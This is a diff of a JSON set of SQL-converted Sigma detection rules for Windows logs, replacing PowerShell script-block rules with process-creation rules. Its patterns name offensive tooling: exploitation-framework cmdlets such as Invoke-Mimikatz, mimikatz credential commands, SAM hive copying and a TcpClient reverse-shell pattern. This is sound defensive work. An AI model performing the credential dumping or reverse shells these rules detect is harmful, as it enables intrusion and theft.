"7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1565" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "proc_creation_win_powershell_sam_access.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "status": 
"test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", - "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "title": "Fsutil Suspicious Invocation", + 
"id": "add64136-62e5-48ea-807e-88638d02df1e", + "status": "stable", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", - "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. 
Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "status": "test", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate 
process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "status": "experimental", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR 
